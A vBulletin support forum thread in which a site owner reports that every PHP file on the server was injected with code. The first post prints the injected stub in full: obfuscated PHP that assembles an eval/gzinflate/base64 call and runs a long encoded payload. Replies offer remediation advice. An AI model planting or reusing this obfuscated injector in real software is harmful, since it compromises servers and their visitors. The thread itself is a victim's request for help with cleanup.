Announcement

Collapse
No announcement yet.

My vBulletin Suite 4.2.0 Patch Level 2 was hacked editing all php files!

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [Forum] My vBulletin Suite 4.2.0 Patch Level 2 was hacked editing all php files!

    Hi all!
    My forum was hacked or similar, I can't use it because all php files are edited and have ALL a code added at above:

    Code:
    <?php$md5 = "2a91cf451e08d33f50a63c22ad76930c";
    $af = array("a","(","_",")","$",'s','r','4',"o",'i',"z","6","g","t",'d',"b","c","l","e",";",'v','f',"n");
    $bf2 = create_function('$'.'v',$af[18].$af[20].$af[0].$af[17].$af[1].$af[12].$af[10].$af[9].$af[22].$af[21].$af[17].$af[0].$af[13].$af[18].$af[1].$af[15].$af[0].$af[5].$af[18].$af[11].$af[7].$af[2].$af[14].$af[18].$af[16].$af[8].$af[14].$af[18].$af[1].$af[4].$af[20].$af[3].$af[3].$af[3].$af[19]);
    $bf2('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');
    ?>
    Please check for vulnerabilities!!!

  • #2
    There is NOTHING in vBulletin that would allow for any file, let alone all files, to be edited. This is a server issue.

    Comment


    • #3
      Yes a server issue. Find how the server was accessed and fix it. Then move on to fixing the files. Best bet is remove the infected and reload.
      www.cdmagurus.com
      www.cellphone-gurus.com

      Comment


      • #4
        any suggest to find it?

        Comment


        • #5
          Originally posted by RedFoxy View Post
          any suggest to find it?
          Ask your host for ftp logs.

          Comment


          • #6
            Your host should be able to provide logs that show who has accessed the server and from what IP. Ask them for these logs.

            Please don't PM or VM me for support - I only help out in the threads.
            vBulletin Manual & vBulletin 4.0 Code Documentation (API)
            Want help modifying your vbulletin forum? Head on over to vbulletin.org
            If I post CSS and you don't know where it goes, throw it into the additional.css template.

            W3Schools &lt;- awesome site for html/css help

            Comment


            • #7
              Originally posted by ericfahey View Post
              Ask your host for ftp logs.
              I've no FTP

              Originally posted by Lynne View Post
              Your host should be able to provide logs that show who has accessed the server and from what IP. Ask them for these logs.
              Looks like that's a vulnerability of php because I found other website on my server with php edited

              - - - Updated - - -

              I looked for access by ssh but nothing, all logs are ok

              Comment


              • #8
                Originally posted by RedFoxy View Post
                I've no FTP

                Looks like that's a vulnerability of php because I found other website on my server with php edited
                In that case ask your host to upgrade the php in their server. They should be using the latest version of it.

                To clean up your forum files, overwrite them with a fresh set from your version of vb which you can download from your customer area. Also check your server space for anything out of ordinary such as files with malicious codes left behind and things of that kind.

                Comment


                • #9
                  it was more hard to do it because it changed ALL .php files of all websites

                  Comment


                  • #10
                    any modifications added? look for vulnerabilities there

                    the rest of the mod community would be very interested if you discover a bad mod

                    Comment


                    • #11
                      Originally posted by RedFoxy View Post
                      it was more hard to do it because it changed ALL .php files of all websites
                      Some vulnerability on your server allowed them to upload a script somewhere. The script does a listing of all php files and adds its code to the top. This is pretty basic stuff in all reality. Not very difficult to do.

                      Even if you don't use FTP on the site they can get in via FTP if the daemon is running. They can get passwords from email, FTP, or telnet. Someone else on the server could upload a vulnerability. There could be problems in Apache, PHP, MySQL, Java or even the server kernal that needs to be updated. Quite a few hundred places to look on a typical server for vulnerabilities.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API - Full / Mobile
                      Vote for your favorite feature requests and the bugs you want to see fixed.

                      Comment


                      • #12
                        There has been a browser plugin from adobe which had exploits and due to that it was possible to access ftp programs and transfer the site informations + passwords to third party. Check if you have your browser plugins updated and change all passwords to each ftp site.
                        No private support, only PM me when I ask for it. Support in the forums only.

                        Comment

                        widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                        Working...
                        X